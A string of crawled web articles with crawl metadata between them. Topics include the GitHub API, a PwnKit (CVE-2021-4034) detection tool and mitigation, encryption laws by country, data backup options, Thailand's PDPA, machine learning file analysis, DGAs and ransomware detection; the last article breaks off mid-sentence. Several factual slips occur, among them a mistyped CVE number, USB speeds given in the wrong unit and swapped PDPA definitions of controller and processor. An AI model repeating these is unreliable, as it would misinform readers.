access private info using GitHub API. From here, you can follow the same process we took in the previous step to #GET Chris Wanstrath’s profile. Only this time, we’ll #GET your user profile. Just add your username and access token to the API request. Now you should see non-public data about your profile in the response. For example, you should see a response line for “Plan” that shows the details of your specific GitHub plan. You can also use OAuth tokens for applications that need to read or write private info using the API. These tokens offer revocable access and limited access. For the purpose of an application, revocable access allows an end-user to remove authorization to a third-party app at any time. The limited access lets the end-user review access that a token will provide before granting authorization to the third-party app. You can create these tokens with a web flow. An app will send users to GitHub for logging in. Then a message will appear showing the name of the app and the access levels it’s requested. Once authorized by the user, GitHub will automatically redirect the user back to the app. Step 3: Get Repositories Similar to increasing your request per hour count, any meaningful use case of the GitHub API will involve repositories. One of the most common use cases here is fetching a repository. You can use this to view repositories for an authenticated user, list repositories for a different user, or list repositories for an entire organization. The information that returns from your call depends on the scope of the tokens that you authenticated. For example, a public repository scope will generate a response for all public repositories that you can access from GitHub.com. A general “repo” scope will show both public and private repositories that you have access to on GitHub.com. You can add a parameter that will narrow the results. For example, you could fetch only repositories you directly own, organizational repositories, or repositories used for team collaboration. Here’s a sample code request to show you what I mean: $ curl -i “https://api.github.com/users/defunkt/repos?type=owner” In this case, we’re only fetching repositories owned by user defunkt. In addition to fetching an existing repository, the GitHub API also allows you to create a new repository. To do this, you need to POST JSON code related to the confirmation and details of the new repository. For example, you’ll need to give it a name and determine whether or not the repository is public or private. If you create a private repository, you need to authenticate it to see it when you’re trying to retrieve information using the API. To prevent the leaking of private information, the GitHub API will return a 404 error and a “Not Found” message if you try to request information without authentication.
<urn:uuid:6f5d6be2-1e93-447f-965d-f06a45a3413c>
CC-MAIN-2022-40
https://nira.com/github-api/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00253.warc.gz
en
0.860168
2,610
2.671875
3
What is PwnKit Vulnerability CVE-2021-4034? On January 25th, 2022, a critical vulnerability in polkit’s pkexec was publicly disclosed (link). The Qualys research team named this vulnerability “PwnKit”. The polkit package is meant for handling policies that allow unprivileged processes to communicate with privileged processes on Linux systems. Pkexec is part of polkit and handles the execution of commands by different user contexts following the polkit-defined policies. Vulnerable machines are installations of Ubuntu, Debian, Fedora, CentOS and more. Why is it a dangerous vulnerability? By exploiting this vulnerability, attackers on a vulnerable host could easily gain full root privileges from any unprivileged user. The vulnerability has been widely discussed, and we believe malicious actors could start using it on vulnerable machines. A POC of exploitation was also published publicly on GitHub: Therefore, organizations and their security teams are advised to check their entire Linux-based machines and make sure they aren’t vulnerable. What is “PwnKit-Hunter” and how it can help me? PwnKit-Hunter is a set of tools that will help determine if your system’s polkit package is vulnerable to CVE-2021-4043, a.k.a. PwnKit. The link for the “PwnKit-Hunter” detection scripts can be found here: The tools are: This script uses your apt cache to find the current installed version of polkit and compare it to the patched version according to your distribution. The patch of Debian and Ubuntu to CVE-2021-4043 contained new exit() line that occurs only if the policykit-1 package is patched. This code will try to trigger this exit(), and will search for the appropriate code. In case pkexec exited with different code, the package needs to be updated. DISCLAIMER: This script is only working on Debian and Ubuntu variants, as other distros patched the code in a different way. How to run “PwnKit-Hunter” git clone https://github.com/cyberark/PwnKit-Hunter.git cd PwnKit-Hunter ./CVE-2021-4034_Finder.py git clone https://github.com/cyberark/PwnKit-Hunter.git cd PwnKit-Hunter gcc PwnKit-Patch-Finder.c -o PwnKit-Patch-Finder ./PwnKit-Patch-Finder What is the mitigation? The recommended fix is to update your systems according to the security advisories of your Linux distribution type. NIST Advisory: https://nvd.nist.gov/vuln/detail/CVE-2021-4034 In order to mitigate it without updating, remove the setuid permission from pkexec: chmod 0755 $(which pkexec) To help ensure that the fix was fully deployed, CyberArk Labs developed simple scripts to detect and check if a scanned host is vulnerable or not. The “PwnKit-Hunter” script is in the following GitHub repository:
<urn:uuid:a39d709c-e375-401f-bd72-f7f4477e3dab>
CC-MAIN-2022-40
https://www.cyberark.com/resources/threat-research-blog/checking-for-vulnerable-systems-for-cve-2021-4034-with-pwnkit-hunter
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00253.warc.gz
en
0.874863
729
2.53125
3
From private conversations through the likes of WhatsApp to confidential browsing histories through VPNs, encryption plays an integral role in our freedom of expression and privacy. Yet, with ongoing government attempts to create “backdoors” into encryption services/products, many countries face severe restrictions when it comes to using apps and tools that utilize cryptography. To find out where the heaviest restrictions are, our team of researchers has analyzed over 200 countries’ legislation to see: - Which countries require manufacturers/sellers to get a license before producing or selling cryptography products/services - Which countries have import and/or export restrictions on cryptography products/services - Which countries don’t have a personal use exemption on travel with encrypted laptops - Which countries place obligations on providers to hand over encryption keys for law enforcement purposes (factoring in whether a warrant is required for this) - Which countries place obligations on end users to hand over encryption keys for law enforcement purposes (factoring in whether a warrant is required for this) What did we find? The vast majority of countries have some kind of restriction on encryption technologies, whether it’s import/export laws or law enforcement access to encrypted data. Severer restrictions are noted in places one might expect them, i.e. Russia and China, but heavy restrictions are also in place across many other countries, too. And with more and more legislation and investigative powers being introduced, restrictions are only set to increase in the coming months and years. For example, while Brazil ranks as one of the “freer” countries due to its current legislation, this is in spite of attempts to impose further restrictions. Recent court orders have tried to block WhatsApp, and Facebook also faced a legal battle with the country due its lack of cooperation in a criminal investigation (which even resulted in the Vice President of Facebook being arrested). In short, many countries may grant citizens the right to freedom of speech and privacy, but thwart this when it comes to encryption, citing national security and serious crimes as the reason. Which countries require encryption providers to decrypt data for law enforcement purposes? One of the biggest concerns when it comes to encryption is the access granted to law enforcement agencies, whether it be by decryption key or a requirement for providers to decrypt the data for them. As the below map shows, a large number of countries have at least some potential access to providers’ encryption keys. A handful of countries, including China and Russia, have unprecedented access to decrypted data. In Russia, for example, the Sistema Operativno-Rozysknykh Meropriyatii (SORM — the System for Operational-Investigative Activities) gives the Russian federal security service, the FSB, access to electronic messages and the keys to decrypt these without judicial authorization. Many European, Asian, and African countries, as well as the United States, have laws that enable law enforcement to request providers hand over encryption keys and/or decrypt data. In the United Kingdom, a number of laws grant law enforcement the right to request encryption technologies be removed on various communications. Section 49 of the Regulation of Investigatory Powers Act 2000 states that when protected information is in the possession of law enforcement, they can, with written permission from a judge, impose a disclosure requirement for data to be produced in intelligible form. Law enforcement must have reasonable grounds that someone possesses the key to the protected information, that disclosure is necessary for national security, detecting/preventing a crime, or that it is in the interest of the UK’s economic well-being, that disclosure is proportionate to what’s sought to be achieved, and that disclosure isn’t possible without imposing the order. In the United States, Section 103(a) the Communications Assistance for Law Enforcement Act of 1994 suggests that communications providers must ensure intercept capabilities when issued with court orders or other such lawful authorization. However, “A telecommunications carrier shall not be responsible for decrypting, or ensuring the government’s ability to decrypt, any communication encrypted by a subscriber or customer, unless the encryption was provided by the carrier and the carrier possesses the information necessary to decrypt the communication.” Most laws carry the same power as that of the United States, placing requirements on providers to decrypt any data that they have encrypted themselves but not data that is encrypted by other providers or the users themselves. A number of other countries impose ambiguous laws that provide the potential for law enforcement to request the disclosure of encrypted information – or laws have been interpreted in such a way. For instance, in the European Union, the Council Resolution of 17 January 1995 on the Lawful Interception of Telecommunications offers some guidance on the laws that should have been implemented in EU countries. The resolution states that “If network operators/service providers initiate encoding, compression or encryption of telecommunications traffic, law enforcement agencies require the network operators/service providers to provide intercepted communications en clair.” En clair means “in plain language” and can therefore be interpreted to mean decrypted. Which countries require encryption users to decrypt data for law enforcement purposes? It’s a similar picture when we look at law enforcement powers to request decryption keys or decrypted data from users of encrypted services/products. The laws tend to cover communications or access to computers, requiring those in possession of a key to hand it over to law enforcement upon request or to aid them in the decryption process. Again, some countries don’t have specific laws but do have ambiguous laws in place. In other cases, countries may rely more heavily upon service providers to hand over the data, i.e. in the United States where no law explicitly provides law enforcement the power to request users hand over decrypted data/keys. Ultimately, getting “backdoor” access to encryption providers’ data is the easiest way to access encrypted data, which is why a worrying number of countries are trying to implement such measures. This includes: - India’s ongoing battle with WhatsApp - Brazil’s recent court orders to try and block WhatsApp and current Fake News bill which is attempting to break end-to-end encryption - United States’ bill for backdoor access to encrypted data (submitted to Congress in June 2020). Which countries require licenses for producing or manufacturing encryption services/products? A large number of African, Middle Eastern, and Asian countries have sweeping licensing requirements. This means the majority of sellers or manufacturers of cryptography products must obtain a license before distributing. France also has such a requirement with any person who wishes to provide cryptography services having to declare so to the Prime Minister. Some countries, e.g. Turkey, Ethiopia, Tunisia, and Mali, have some licensing requirements but don’t require all providers of cryptography services to obtain a license. For example, in Tunisia, any business importing cryptography products for its own personal use (or temporary use) doesn’t require a license. A number of countries have also enacted laws that enable the relevant ministries to create licensing requirements for cryptogrpahy services but don’t appear to have put anything into place as of yet. This includes the Bahamas and Barbados. Which countries have import/export limitations for cryptography services/products? A far greater number of countries have some kind of limits when it comes to importing and/or exporting cryptography products (or products that contain cryptography but aren’t solely for encryption purposes). In most cases, this requires a business to register their company and product with the designated agency within the country they’re importing to or exporting from. This may also include some technical specifications. Quite a few countries with large-scale requirements for cryptography licenses also pose severe restrictions on the import and export of these products. For example, for countries within the Eurasian Economic Union (EAEU) — Armenia, Belarus, Kazakhstan, Kyrgyzstan, and Russia — an import/export license, permit, and registration of notification is required and various things are also analyzed, including a list of cryptographic algorithms, the maximum key length, a list of implementing protocols, how the encryption is employed, what type of data is encrypted, and how the data is encrypted. The vast majority of countries with customs laws restrict exports of cryptography products and/or limit imports from designated countries. A large number are part of the Wassenaar Agreement (for a full list, see the methodology section) and/or are governed by EU law. Those who have signed up to the Wassenaar Agreement: - Have agreed to maintain national export controls on certain items, i.e. cryptography services - Have agreed to report on transfers and denials of specified controlled items to destinations outside the Arrangement - Exchange information on sensitive dual-use goods and technologies Again, a number of countries have laws in place that will enable them to create import/export requirements for cryptography products but don’t appear to have put anything in place as of yet. Which countries don’t have a “personal use exemption” for those traveling with encrypted laptops? As well as imposing import/export restrictions on businesses offering encryption services, some countries also have clear restrictions for those traveling with encrypted laptops. In contrast, some of the countries that are part of the Wassenaar Agreement offer travelers a “personal use exemption.” Please note: While clear restrictions/exemptions are offered in the above countries, travel to other countries may or may not be restricted. It is always best to check with the country you’re traveling to beforehand, regardless of whether or not they’re part of an agreement. To determine the laws in place across each category, we have analyzed various pieces of legislation in each country. This includes Criminal Procedure Codes, laws on Cybercrime, Communication/Telecommunication Acts, Interception/Surveillance Acts, and any other relevant decrees, acts, laws, or resolutions. We have focused solely on legislative powers/orders and those that primarily affect communications providers, internet service providers, or data stored on/accessed through computers. A country may not have such legislation or may appear to have protections in place, but the picture may be different in practice. However, to avoid being subjective in our results, we have only used what is “legally” permitted within each country. As mentioned, we have also looked at legislation that can be interpreted to cover encryption, even if it doesn’t mention it specifically. In these cases, we have looked for ambiguous wording, such as requirements to make data “intelligible” or we have found examples of telecommunications providers, i.e. Vodafone, interpreting the law to suggest they believe law enforcement could request they decrypt data within the country. Where nothing has been found, we have omitted the country from the results. The lack of legislation could suggest that there are no restrictions/law enforcement powers, but for accuracy, we haven’t included these countries. For a full list of sources, please visit our spreadsheet: https://docs.google.com/spreadsheets/d/1dcPIqWYJ5fe0HY6pCbWixTi6B9U9yX7FLURBbko5d1g/edit?usp=sharing
<urn:uuid:071a5850-389d-454a-836d-4d613b4df019>
CC-MAIN-2022-40
https://www.comparitech.com/blog/vpn-privacy/encryption-laws/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00253.warc.gz
en
0.921301
2,344
2.53125
3
by Jason Kohrs |The data on your hard drive is the most critical item inside your computer, and the only item which cannot be replaced. It may be an unwanted hassle and expense to replace a defective memory module, monitor, or processor, but there is no replacing data once lost.| In addition to the possibility of a simple hard drive failure, the threat of internet borne worms and viruses has become an increasing risk to data loss or corruption. Although you may not be able to provide absolute protection to your hard drive, there are various ways that you can ensure that the data on your hard drive is protected. Five methods of backing up your data are summarized below. |1. USB Flash Drives| |Although I am not recommending that flash drives be used for the actual data storage, they are a convenient means of transferring data from one computer to another. Important files can be quickly loaded onto a device such as a USB 2.0 Flash Drive, and transported to another computer for safe keeping. Installation and operation is extremely simple, and other than perhaps having to install a software driver, the use of a USB flash drive is a matter of having an available USB port on your computer. Just about every computer produced over the last several years has USB ports included, with more modern systems supporting the USB 2.0 standard. USB 2.0 allows for data transfer rates of up to 480 MB/s, which is a tremendous improvement over the original USB speed limit of 12 MB/s, and allows a user to fill their drives with data in a relatively short period of time.| Although the storage capacity of flash drives has increased greatly over the last year or so, users are still limited to common sizes of 4GB and 8GB. |2. CD and DVD Writers/Re-Writers| |The falling prices of CD and DVD writers/re-writers have made them a staple of just about every modern computer. These devices can typically be found installed in a computer case, but external devices supporting USB 2.0 or Firewire are available for greater flexibility and ease of installation.| A combination drive will provide the user a high speed CD reader/writer, as well as a DVD reader, for under $40. The extremely low price of the drive (and the blank media) makes for an inexpensive means of creating data backups, and the re-writable media increases the convenience by allowing the same disc to be erased and reused many times. The main limitation of using a CD writer for data backups is that the discs are generally limited to a capacity of 700MB per disc. Not nearly enough for a full backup, but adequate for archiving key files. The popularity of DVD writers/re-writers has surged thanks to dropping prices, and they are pushing the stand alone CD burner towards extinction. DVD media affords the user far more storage capacity than a CD, and DVD burners can generally burn CDs as wells as DVDs. The recent availability of double layer DVD burners represents a large boost in the capacity of writable DVDs, taking the previous limit of 4.7GB per disc and nearly doubling it to 8.5GB. With proper storage, CD/DVD media can provide long term storage that cannot be jeopardized by hardware failure. The data on a CD or DVD can easily be read by just about any computer, making it a good choice for archiving files that aren’t excessively large. |3. External Hard Drives| |As the name might imply, external hard drives are generally the same type of drive you might find inside your system, but housed in a smaller, external enclosure of its own. The enclosure will feature at least one data interface (such as Firewire, USB, or Ethernet), and the capacity is only limited by the size of hard drives presently available and the user’s budget.| The external hard drive provides a user the option of connecting an additional 2 TB of storage to their system by using either a USB 2.0 or Ethernet connection. Installation for such a device is rather simple, and may involve the installation of some basic software, as well as making the necessary connections between the computer and the external enclosure. The capacity of external hard drives makes them ideal for backing up large volumes of data, and many of these devices simplify the process by including software (or hardware) features to automate the backup. For example, some Seagate External drives feature a “one-button” backup option right on the case. In addition to being a convenient method of backing up large volumes of files locally, most external hard drives are compact enough to be portable. The inclusion of a common data transfer interface, such as USB, allows an external hard drive to be connected to just about any modern computer for data transfer, or for more than one computer to share the external hard drive as a backup. |4. Additional Hard Drives| |By simply adding an additional hard drive to you system, you can protect yourself from data loss by copying it from your primary drive to your secondary drive. The installation of a second hard drive isn’t difficult, but does require a basic understanding of the inner working of a computer, which may scare off some users. We do offer a “how-to” section on our site for many tasks such as installing a hard drive into a computer system.| To take the installation of a second hard drive to another level of security and reliability, the hard drives may be installed in a RAID array. RAID stands for a Redundant Array of Independent (or Inexpensive) Disks, and can be configured in several manners. A thorough discussion of RAID and all of its variations would be an article all by itself, but what may be of interest to this discussion is what is known as RAID 1. A RAID 1 array requires two hard drives of equal size to be installed on a RAID controller, which will then mirror one drive to the other in real time. Many motherboards now come with RAID controllers onboard. With a RAID 1 array in place, if one hard drive should ever fail, the system won’t miss a best by continuing to run on the remaining good drive, and alert the user that one drive may need to be replaced. |5. Online Storage| |Online services, such as Carbonite, allow users to upload their files to a server for safe keeping. Although it may be convenient to have the data available wherever an internet connection is available, there are a few limitations.| The services generally charge a yearly fee relative to the amount of storage space required. Security is supposed to be very tight on these services, but no matter how secure it may seem, it is still just a password keeping prying eyes from your potentially sensitive documents. The speed of your internet connection will also weigh heavily on the convenience of your backup, and no matter what type of connection you have; it can’t compete with local data transfer rates. |Although not a comprehensive list of options available for backing up your data, the five items listed provide some simple and relatively affordable means to ensure that your data is not lost. Data loss is an extremely frustrating and potentially costly situation, but one that can be avoided.|
<urn:uuid:10f3fec3-e616-43a7-916b-a64967adae06>
CC-MAIN-2022-40
https://www.fcnaustin.com/5-ways-to-backup-your-data/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00253.warc.gz
en
0.942038
1,488
2.625
3
Thailand’s Personal Data Protection Act or PDPA Thailand’s Personal Data Protection Act or PDPA for short is a comprehensive data privacy law that was passed by the Thai government in 2019. As one of the many nations around the globe to implement personal data protection laws following the passing of the EU’s General Data Protection Regulation or GDPR, the PDPA is the first consolidated data protection law to be passed in the country of Thailand. As such, the PDPA places various requirements and restrictions on how businesses, organizations, and individuals can go about collecting, processing, using, and disclosing the personal data or information of Thai citizens. What is the scope and application of the PDPA? The PDPA applies to any “person or legal person that collects, uses, or discloses the personal data of a natural (and alive) person, with certain exceptions (e.g. exception of household activity)”. Furthermore, the PDPA also data controllers or data processors who collect, use, or disclose the personal data of individuals residing within Thailand. What’s more, the PDPA also contains provisions related to extraterritorial applicability over business entities and organizations outside of Thailand under the following circumstances: - Where the activities of collection, use, and disclosure of personal data or information are in relation to the offering of goods or services to data subjects residing in Thailand, irrespective of whether payments are made directly by said data subjects. - Where the activities of collection, use, and disclosure of personal data or information are in relation to the monitoring of a data subject’s behavior, when said behavior takes place within Thailand. How is the term “personal data” defined under the PDPA? Under the PDPA, personal data is categorized by two separate terms, “general personal data” and “sensitive personal data”. Both of these data types have different requirements and exemptions under the PDPA. Moreover, the PDPA also provides specific definitions for the terms “data controller” and “data processor”, while other forms of data such as health data or biometric data are not applicable under the PDPA. The definitions provided by the PDPA are as follows: - General personal data– “Any information relating to a natural person, which enables the identification of such a person, whether directly or indirectly, but not including information of deceased persons”. - Sensitive personal data– “: Any personal data pertaining to racial or ethnic origin, political opinions, cult, religious or philosophical beliefs, sexual behavior, criminal records, health data, disability, trade union information, genetic data, biometric data, or of any data which may affect the data subject in the same manner as to be prescribed by the PDPC”. - Data controller– “A person or legal person who operates in relation to the collection, use, or disclosure of the personal data pursuant to the orders given by or on behalf of a personal data controller, whereby such person or legal person is not a personal data controller”. - Data Processor– “A person or legal person having the power and duties to make decisions regarding the collection, use, or disclosure of the personal data”. What are the requirements of business entities within and outside of Thailand under the PDPA? Under the PDPA, there are a variety of requirements and restrictions that individuals, business entities, and organizations both within and outside of Thailand must adhere to. These requirements include: - Data processing notification– Data controllers are required to inform data subjects prior to or at the point of collection of all required details, i.e. the purpose of the collection, except in cases where a data subject already knows or has already been informed of such details. - Data processing records– Data controllers and data processors are required to maintain records of all data processing activities, which can be either in electronic or written form. These processing records must be presented to both data subjects as well as the Office of the PDPC. - Data protection impact assessment– Data controllers are required to acknowledge the level of risk and severity associated with personal data they collect, use, and disclose, and the ways in which these risks could adversely affect the rights and freedoms of natural persons. - Data protection officer appointment– Under the PDPA, business entities and organizations are also required to appoint a data protection officer or DPO under certain circumstances. For example, the appointment of a DPA is mandatory if the core activity of a data controller or data processor is to collect, use, or disclose the sensitive personal data of data subjects. - Data breach notifications– Data controllers are required to notify the Office of the PDPC when data breaches occur without delay, and when feasible, within 72 hours of having become aware of the said data breach. In instances where a data breach is likely to pose significant harm or risks to associated data subjects, data controllers are also required to notify said data subjects, as well as provide remedial measures in relation to the breach without undue delay. - Data retention– When collecting the personal data of data subjects, data controllers are required to inform said data subjects prior to or at the time of collection in regards to the period of time in which their data will be retained. If it is not possible to provide data subjects with a specific time period, the expected data retention period must instead be specified, according to a specific data retention standard. - Children’s data– When collecting data from data subjects under the age of 20, data controllers may need to obtain parental consent for minors aged between 0 to 10 years old, obtain the consent of minors who are older than 10 but younger than 20 for an act in which minors are deemed competent to give consent, and obtain parental consent for minors who are older than 10 but younger than 20 for acts in which minors are not deemed competent to give consent. - Special categories of personal data– When collecting the sensitive personal data of data subjects, data controllers are required to obtain explicit consent from said data subjects, unless there is an exemption that applies. To this point, data controllers are only permitted to collect personal data related to criminal records when said collection is handled by an authorized official authority or is otherwise prescribed by other provisions in the PDPA. - Controller and processor– When controlling and processing personal data, data controllers and data processors are responsible for putting agreements in place for the means of outlining the activities carried out by both respective parties. Such an agreement must set out specific obligations of data processors in accordance with the provisions of the PDPA. What are the rights of data subjects under the PDPA and how are these rights enforced? Under the PDPA, data subjects are afforded a variety of rights in regards to the personal data and information they provide to data controllers and data processors. These rights include: - The right to be informed. - The right to access. - The right to rectification. - The right to erasure. - The right to object or opt-out. - The right to data portability. - The right not to be subject to automated decision-making. - The right to withdraw consent. - The right to lodge a complaint. In terms of enforcement and penalties relating to the violation of the PDPA, the law is enforced by the Office of the PDPC, and data controllers or processors who fail to comply with the PDPA are subject to civil liabilities including punitive damages, in addition to other criminal and administrative penalties. These penalties include monetary fines of up to THB 5 million ($160,214), as well as criminal penalties that can include up to 1 year of imprisonment, a fine of up to THB million ($32042), or both. While many data privacy regulations around the world are less restrictive than the EU’s widely known General Data Protection Regulation or GDPR, the PDPA is in many ways one of the more stringent privacy regulations in terms of extraterritorial application. As such, Thai citizens have the peace of mind that their personal data rights are not infringed upon, even dealing with individuals, business entities, and organizations who are not physically located within Thailand. In this way, the data privacy rights of Thai citizens can be upheld at all times.
<urn:uuid:3a7ffb40-af07-448e-95b5-c46253ac8ab8>
CC-MAIN-2022-40
https://caseguard.com/articles/thailands-personal-data-protection-act-or-pdpa/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00253.warc.gz
en
0.918297
1,697
2.890625
3
How Machine Learning Techniques Impact File Analysis Applying machine learning (ML) and artificial intelligence (AI) techniques to analyze files within a content repository can raise the bar on operating efficiencies and produce smarter solutions that bring “structure” to unstructured data. However, not all unstructured data is created equally. The primary challenge is determining the differences in file content and context. Technologies based on text-oriented content analysis don’t work well when analyzing non-text files such as images. They’re unable to look inside the files and identify their contents. Over the years, systems that rely on upfront metadata tagging have been developed as a workaround for this issue. For instance, a digital asset management system is a good way to organize large collections of images, provided that somebody develops and maintains the relevant metadata including annotations.Various types of content need to be handled differently as some have well-defined metadata (ex. MS Office documents), while others need intensive analysis to extract rich metadata (ex. Audio, Video). Metadata can be extended beyond file system attributes to include an in-depth analysis of the content itself. Here are a couple ways this can be done: Natural Language Processing (NLP) techniques such as Sentiment Analysis determines the tone of the content (positive, negative), and Named Entity Recognition can be used to extract “business entities” such as personal names, addresses, company names, etc., and group documents in different ways to allow for faster comprehension of large datasets. These techniques have their limitations when applied to large business content sets. For example, sentiment analysis is more useful for short documents such as chat logs, and less useful for business documents, which tend to be fairly neutral in tone. Named entity recognition techniques require a large pre-classified training set. Usual public training sets are based on location/country specific news articles, that are not representative of business data sets. Search engine techniques use machine learning for pattern detection of significant text and phrases within the content. These techniques were mostly designed to work off of large public datasets, and have limitation and varying degrees of success with enterprise datasets. For example, quick access to search results is often complicated by a common requirement to layer a set of complex access control structures (using roles, groups, hierarchical permissions, etc.) on content within an enterprise.When it comes to using search engine techniques for image searches, this is only slightly different from the text search engine. A metadata image search engine rarely examines the actual image itself. Instead, it relies on actual text from the content within the files and/or text used in the description of the image. Deep Learning (DL) is part of a broader family of machine learning which enables the ability to learn from data that is unstructured or unlabeled by building learning algorithms that mimic the brain. Deep learning techniques such as computer vision identify high-level concepts within a target image and build a dictionary of terms to expand the search capability to include similar concepts. For example, if it learns to identify images of digging equipment on a construction site, it can over time expand to include similar images. This requires a very large amount of pre-classified content, which is typically based off of public image datasets. Training needs to occur on a comprehensive sample of enterprise content to extract meaningful information within images, rather than generic concepts that are less useful.Another technique is word vector analysis which identifies significant keywords or phrases within the content and their interrelationships to figure out synonyms, antonyms, and building business domain vocabularies that can be used to increase the accuracy of search results. Recommendation systems To derive meaningful results from enterprise content repositories, it’s clear we need to retrain typical ML/AI algorithms on appropriate datasets of reasonable size. Therefore, more time and effort must be spent on gathering and annotating sample datasets, rather than on tuning existing algorithms. With a rich set of metadata attributes in hand, we can leverage these to construct a variety of non-intrusive, intelligent features that can work side by side with the user to pull up appropriate content at the right time. For example, we can build recommendation systems to suggest potential collaborators and interesting content. These recommendation systems can be built using a couple of different approaches: - Collaborative filtering that leverages groups of similar users to recommend content created/accessed by one user to other users, and - Content-based recommendation systems that drive off of content metadata to identify content similar to the one previously accessed or currently being accessed. Collaborative filtering requires a large grouping of users to be meaningful and content-based recommendation systems require a large set of historical access patterns to be useful. Typically these problems are mitigated by combining both approaches and switching from one to the other as appropriate. From consumer to enterpriseA variety of ML/AI techniques are available to deliver the intelligent features within content repositories that can learn and become better over time. But blindly applying approaches from consumer applications to enterprise data sets can be a frustrating experience. Be discriminating to deliver meaningful results. In the next article, we will dive into specific applications of these techniques to problems in Data Governance and Collaboration products. Get started with Egnyte today Explore the best secure platform for business-critical content across clouds, apps, and devices. LATEST PRODUCT ARTICLES Don’t miss an update Subscribe today to our newsletter to get all the updates right in your inbox.
<urn:uuid:56420d4e-8056-4c70-a614-d2f476e4bd4c>
CC-MAIN-2022-40
https://www.egnyte.com/blog/post/how-machine-learning-techniques-impact-file-analysis
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00253.warc.gz
en
0.918895
1,131
2.859375
3
A Look at Ransomware in 2019 Ransomware, a malicious program that denies a user’s access to their computer until a sum of money is paid or face losing all of your data, is still a major issue for all computer users. In May of 2019, government officials of Baltimore, MD, were attacked by ransomware. How did this impact Baltimore? Thousands of government computers, e-mails, emergency service dispatch systems, and government websites (such as water bills and health alerts) were completely inaccessible to the city. As of right now, the estimate for damages from this ransomware attack alone is over $18 million dollars, according to news source NY Times. This goes to show that the risk of being attacked by ransomware is as high as ever. Why has there been an increase in ransomware attacks over the past few years? A tool created by N.S.A., known as EternalBlue, has fallen into the hands of hackers around the world in 2017, notably North Korea and Russia. The infamous WannaCry cyber-attack has been linked to North Korea hacking entity referred to the Lazarus Group. Whereas Russia has ties to the creation and malicious use of the ransomware known as NotPetya. Both of these malicious programs have cost billions of dollars in damages for governments, businesses and local U.S. citizens. This is the ransomware demand. It threatens that after 10 days, Baltimore won’t get its data back. Armor says there have been no transactions to the hacker’s bitcoin wallets. @wjz, Mike Hellgren, Investigative Reporter for WJZ Outdated Software Leaves Computers at High Risk Right now, hackers are attacking local governments with aging digital infrastructure. Due to outdated software, it’s harder to prevent ransomware attacks and to resolve it, but easier for ransomware to compromise computers. Ransomware exploits vulnerabilities found in unpatched software which allows it to spread to other devices on the same network. Other U.S. governments affected by ransomware include Allentown, PA., San Antonio, TX., Cartersville, GA., and many other states and local governments. What Can You Do? All it takes is one click on a phishing e-mail link to have your computer compromised by ransomware. How much would you pay to save your computer files? Don’t find out. Make sure to update your operating system to the most up to date version of available software. If you’re still using Windows 7, you definitely want to update to Windows 10 due to Windows 7 reaching its end of life in a matter of months. Here’s a great article on other steps you can take to stay safe social media, another way hackers steal your private information. Ensure your cyber security is up to date with Kustura Technologies help.
<urn:uuid:c9a80927-910f-4c8a-a5ff-8c373ec55612>
CC-MAIN-2022-40
https://www.kustura.com/a-look-at-ransomware-in-2019/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00253.warc.gz
en
0.948181
580
2.765625
3
DGAs (Domain Generation Algorithms) are rendezvous domains for malware and hacker-controlled-servers to communicate, generated by rules or algorithms, usually encoded/encrypted and often have a short life span. Hackers use DGAs to evade the detection or blocking from static blacklist-based systems, for example, (some) firewalls using threat intelligence data that does not get updated as frequently as needed. It is not easy to detect DGAs because they satisfy the DNS protocol in every manner and there is usually no signature to identify them. This is why we use artificial intelligence/machine learning technology to detect them. If you look at some DGA domains you can find that quite often they appear to be collections of random characters, and because of that, from lexical analysis point of view they are statically quite different from normal domains. On top of that, they usually do not resolve to IP addresses since most of them are not even registered. Both of these are very important characteristics, or “features” as called in machine learning, to be used when we train the machine learning models. Machine learning works similar to the way human beings forecasted weather before certain modern technologies, including sensors and computers were invented. We observed lots of similar independent signals such as temperature, wind direction and animal behavior then associated them based on very long term of observation. If you think of some weather proverbs you will know what I mean. Just like weather forecasting, the effectiveness of using machine learning may have false detections as the training data might be biased or not applicable. Since DGAs are early indicator of malicious activities, such false detections can be handled depending on users’ risk tolerance levels.
<urn:uuid:74b98fc0-788d-4fb1-b8ff-704d860ca49b>
CC-MAIN-2022-40
https://blogs.infoblox.com/security/detecting-dgas-is-like-forecasting-weather/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337595.1/warc/CC-MAIN-20221005073953-20221005103953-00253.warc.gz
en
0.953161
347
3.34375
3
Ransomware is malware that infects a computer, encrypts files and blocks access to them until the user makes a digital payment. Ransomware detection is the process of notifying users when ransomware is present on their system, or their files are already being encrypted, blocking ransomware if possible, and guiding users through recovery steps. Early detection of ransomware is critical for effectively defending against this severe threat and minimizing damage to the organization. There are three primary ways to detect ransomware: signature-based detection, which leverages the binary signature of a ransomware program; traffic-based detection, which detects abnormal patterns in data traffic, and behavioral detection, which detects malware by evaluating the behavior of suspicious operating system processes. This is part of our series of articles about ransomware protection. In this article: Early detection in cyberattacks is very important. The earlier incidents are stopped in the attack chain, the less likely an attacker is to steal sensitive data or compromise organizational systems. Early detection of ransomware attacks is more important than any other malware, because the damage is irreversible. If ransomware encrypts data that is not securely backed up, recovery may not be possible, even if the victim pays the ransom. To minimize damage, it is important to prevent ransomware infection before they start encrypting data. As ransomware advances, early detection becomes more important. Newer ransomware variants steal sensitive company data before being encrypted. If ransomware is detected before data theft occurs, companies will avoid potentially costly and reputationally harmful data breaches. Related content: Read our guide to ransomware prevention While different ransomware variants implement the attack in different ways, most have several things in common: The specific files encrypted will depend on the specific ransomware variant, parameters passed to the ransomware binary to customize its operation for certain victims or campaigns, and pre-configured features of the ransomware program. These could be hardcoded into the ransomware binary itself or added as scripts or utilities packaged with the ransomware. Most types of ransomware contain configurations that specify whether to include or exclude: The following are the most common techniques for detecting ransomware on an infected device. Signature-based ransomware 